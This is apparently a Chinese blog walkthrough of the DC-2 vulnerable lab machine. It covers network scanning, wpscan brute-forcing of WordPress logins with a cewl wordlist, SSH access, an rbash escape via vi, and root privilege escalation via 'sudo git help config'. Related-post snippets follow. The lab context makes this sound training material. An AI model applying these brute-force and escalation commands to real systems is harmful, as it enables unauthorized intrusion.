DC-2渗透实战(详细过程)

原创 已于 2022-11-03 17:23:36 修改 · 1.2k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #安全 #系统安全 #web安全

于 2022-10-14 13:18:03 首次发布
本文介绍了DC-2靶机的渗透测试过程,包括主机发现、端口扫描、Web渗透等步骤,并详细记录了如何利用各种工具和技术进行爆破攻击、提权操作,最终成功获取目标系统的控制权。

目录

DC-2靶机

1.主机发现

2.端口扫描

3.网页信息探测

4.敏感目录扫描

5.Web渗透

生成爆破字典

用户名爆破

密码爆破

后台登录

6.主机渗透

ssh登录

rbash提权

vi设置shell提权

切换用户提权

git提权

DC-2靶机

DC-2靶场下载地址http://www.five86.com/downloads/DC-2.zip

下载完成后用vmware打开

确保DC-2 和kali处在同一网段下

1.主机发现

arp-scan -l

对比靶机MAC地址确定靶机IP为192.168.20.139

2.端口扫描

nmap -sV -p- 192.168.20.139

发现开放80和7744端口 提供http服务和ssh服务

3.网页信息探测

直接在firefox输入192.168.20.138:80 会打不开页面

查阅了一下资料是因为没有重定向

解决办法: 修改本地DNS文件

打开/etc/hosts文件 添加本地dns

访问192.168.20.139

看到有个flag 点击查看一下

 虽然没有flag值 但是提示使用cewl工具生成字典

对站点信息探测

whatweb -v 192.168.20.139

未发现可疑点

4.敏感目录扫描

nikto -host 192.168.20.139

发现一个名为 wp-login.php 的敏感目录文件

直接在浏览器中打开

需要账号密码登录 只需要得到账号密码就行了

5.Web渗透

生成爆破字典

根据提示 用cewl爬取字典 =可以选择放在桌面

cewl http://dc-2/wp-login.php -w ~/Desktop/cewl.txt

用户名爆破

wpscan是kali自带的用户名爆破工具

wpscan --url dc-2 -e u

 爆破出三个用户名

分别是 admin jerry tom

密码爆破

在桌面创建一个user文件 存放admin jerry tom 三个用户名

继续使用wpscan进行爆破

wpscan --url dc-2 -U ~/Desktop/user.txt -P ~/Desktop/cewl.txt

成功爆破出密码

现在得到如下信息

账号 jerry 密码 adipiscing

账号 tom 密码 parturient

后台登录

用爆破到的账号密码进行登录

在jerry账号中看到了flag2

 提示我们换一种方法

6.主机渗透

ssh登录

在端口扫描的时候扫描出了7744端口的ssh服务

并且通过Web渗透得到了两个用户名和密码

现在来尝试一下ssh登录 看看能不能发现什么

ssh jerry@192.168.20.139 -p 7744

jerry用户登录失败

ssh tom@192.168.20.139 -p 7744

成功登录tom用户

ls查看 发现了flag3.txt 奈何权限太小 无法打开

直接从bash变成了rbash 那看来是要进行提权了

rbash提权

因为没有cd权限 就用echo输出查看

先查看一下rbash的PATH路径下的文件

echo $PATH

echo /home/tom/usr/bin/*

 现在能用的命令就是 less ls scp vi 了

vi设置shell提权

进入vi编辑界面

末行模式输入 :set shell=/bin/bash

回车 继续输入 :shell

回车 自动退出vi 说明提权成功 whoami查看权限

虽然不是root权限 但已经从rbash变为了bash

已经升级为bash了,无法执行cat命令是因为环境变量的问题,用命令添加一下两条路径即可

export PATH=$PATH:/bin

export PATH=$PATH:/usr/bin

接下来再查看flag3.txt

 提示我们切换成jerry用户

切换用户提权

切换为jerry用户 用之前获取的密码进行登录

查找一下有无flag文件

find / -name flag*

查看flag4文件

 提示要git提权

git提权

抱着怀疑的态度 想试试SUID提权

先查询一下具有SUID的二进制文件

find / -user root -perm -4000 -print 2>/dev/null

 没有能利用的

还是继续用git提权

sudo -l

发现git能执行root权限

接下来进行提权

sudo git help config

 回车然后输入 !/bin/bash

 回车 输入whoami 发现已经变成了root权限

 进入/root目录 并查看最终flag

成功通关!!!

DC-2靶机进行渗透测试
zll___的博客
03-11 1192
DC-2靶机进行渗透测试
DC-2靶机渗透测试
weixin_52003758的博客
03-19 481
DC-2靶机渗透测试
DC-2靶机渗透测试详细教程
啊醒的博客
05-04 1197
DC-2靶机渗透测试详细教程
靶机实战-DC-2
滕财然的博客
01-31 1077
DC-2靶机实战 文章目录DC-2靶机实战1、主机发现2、端口扫描及其详细信息3、访问web服务(80端口) 1、主机发现 目标IP:192.168.232.143 2、端口扫描及其详细信息 开放80、7744端口 3、访问web服务(80端口) 找不到网站,判断是本地不解析域名,(通常是解析造成的)在hosts文件添加对应的ip和域名 物理机编辑/etc/hosts文件,添加靶机IP地址及...
DC-2靶机渗透
weixin_45349299的博客
01-02 867
title: DC-2靶机渗透详解 date: 2022-1-1 23 :38 :36 tags: DC系列靶机 categories: 学习笔记kali攻击机:192.168.1.103靶机:192.168.2.102,以10000的速率扫描靶机的所有端口,对指定端口的服务做综合详细扫描打不开192.168.2.108:80的原因:没有在本地设置hosts本地hosts文件位置:C:\Windows\System32\drivers\etc添加192.168.2.102 dc-2然后用更新dns缓存查询D
DC-4渗透实战详细过程
tzyyyyyy的博客
10-17 1144
DC-4靶机渗透实战 利用各种姿势方法获取最终flag
DC-3渗透实战详细过程
tzyyyyyy的博客
10-16 3493
DC-3靶机渗透实战 利用各种姿势方法获取最终flag
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
网络空间安全学习
04-20 2310
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
DC系列之DC-2渗透测试
最新发布
qq_45392044的博客
12-24 1287
其实正常情况下来讲,打开浏览器我们输入IP地址的时候,实际上地址栏不应该直接跳到dc-2,如果想正确的访问dc-2这样一个web应用,需要给一个本地的解析,否则访问不了!除了本地需要修改hosts文件,那我们用kali虚拟机去访问目标80端口的时候,我们也需要去修改一下kali虚拟机的host文件。我们可能在渗透测试或者是攻防演练的过程中,我们需要做一个信息收集,我们往往很多的信息都是放在我们网页里面的。写的,它是WordPress模板,WordPress是我们开源的cms的PHP编写的。
VulnHub靶机 DC-5 打靶 渗透测试详细过程
网络空间安全学习
04-18 1654
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
DC-2靶机渗透测试过程(个人学习)
m0_59028058的博客
07-12 1451
使用tom目录查看当前文件夹下的文件可以发先flag3.txt文件,使用 cat 命令显示存在 rbash 限制,这里可以用 vi 来查看flag3.txt文件中的内容。在探测端口和服务的时候可以发现靶机开放了一个ssh端口,只不过不是默认的22端口,是7744端口,尝试利用jerry和tom账户ssh连接。扫描出来可以就可以发现80端口存在一个无法重定向的问题,我们访问网页无法重定向到dc-2这个域名中,则需要修改一下hosts文件。在flag3的提示中,提示了“su”,可能需要用到sudo提权。
靶机实战(DC-2)
weixin_45605313的博客
06-28 466
DC-2实验环境实验过程主机发现端口扫描目录扫描漏洞发现漏洞利用提权总结 实验环境 靶机DC-2 测试机:kali(IP:192.168.186.128),win10 实验过程 主机发现 netdiscover -I eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24 端口扫描 masscan -p 0-65535 --rate=100000 192.168.186.248
DC-2靶机实战
qq_43462485的博客
10-25 273
DC-2靶机实战 攻击机:kali 192.168.43.16 目标机:dc-2 192.168.43.54 一、信息收集 1.使用arp-scan -l列出主机列表然后使用nmap进行端口信息扫描 2.访问web服务发现无法解析域名,此时修改一下hosts文件 手动添加域名和ip的映射 vi /etc/hosts 3.访问web界面并使用wappalyzer浏览器插件检测网站的cms 发现是使用WordPress所搭建的网站,并发现了一个flag提示用cewl生成一个密码字典
Vulnhub-DC-2靶机实战
御七彩虹猫
03-28 4035
Vulnhub-DC-2靶机实战
DC-2靶机渗透实战
ghtwf01的博客
12-01 324
主机渗透系统: kali linux 靶机: DC-2 渗透过程: 先扫网段内存活主机,发现192.168.1.41是靶机ip 扫描靶机所有开放的端口 然后访问80端口的服务,这里根据靶机下载页面上面的提示需要设置hosts文件 访问页面是一个wordpess,找到flag1 它提示登录找到下一个flag,也提示了cewl,于是就用cewl爬一波密码出来,保存在根目录 然后用专门针对wordpress的工具wpscan来扫描所有用户名wpscan --url http://dc-2 --enume
Vulnhub靶机实战——DC-2
冠霖L的博客
09-27 5069
靶机DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip 描述:靶机DC-2DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.132 Kali的IP地址:192.168.22...
DC-2靶场实验过程
2401_84694887的博客
09-27 2042
命令:wpscan --url http://dc-2 --passwords dc2.txt。wpscan --url http://dc-2 --enumerate t 扫描主题。wpscan --url http://dc-2 --enumerate p 扫描插件。wpscan --url http://dc-2 --enumerate u 枚举用户。命令:wpscan --url http://dc-2 --enumerate u。命令:cewl http://dc-2/ -w dict.txt。
DC靶机渗透系列(DC1-DC3)
居上
07-01 904
收获 DC1 回顾了metasploit的一些用法 利用已知cms的exp来getshell hashcat爆破用法 find提权 DC2 cewl根据网页内容生成字典 wpscan结合cewl跑账号和密码 用metasploit的模块来ssh爆破 rbash->bash--------vim逃逸 git提权 DC3 searchsploit的一些用法 在github上搜罗cms探测脚本 john爆破用法 页面模板里添加一句话木马 使用Python开启SimpleHTTPServer 公开的
【CyberSecurityLearning 71】DC系列之DC-2渗透测试(WordPress)
_Co1a
04-18 1098
目录 DC-2靶机渗透测试 一、实验环境 二、实验要求 三、渗透过程演示 flag1: flag2: flag3: flag4: final-flag: DC-2靶机渗透测试 一、实验环境 实验环境: kali2021:192.168.3.151/24(桥接到vmnet0) 靶机环境DC-2(桥接到vmnet0,MAC地址:00:0C:29:3F:B7:2B) 保证kali和DC-2在同一个网段 二、实验要求 靶机中一共有五个flag文件,我们需要找到它们,即可完成任务.
DC-4靶机Web渗透测试实战指南
DC-4靶机可以用来练习如何整理渗透过程的发现,以及如何清晰地撰写测试报告。 8. 防御策略:除了攻击技能的练习,DC-4靶机也适合学习如何建立防御策略,理解攻击者视角来帮助改善自身的安全防御措施。 总之,DC-4-...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tzyyyyyy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值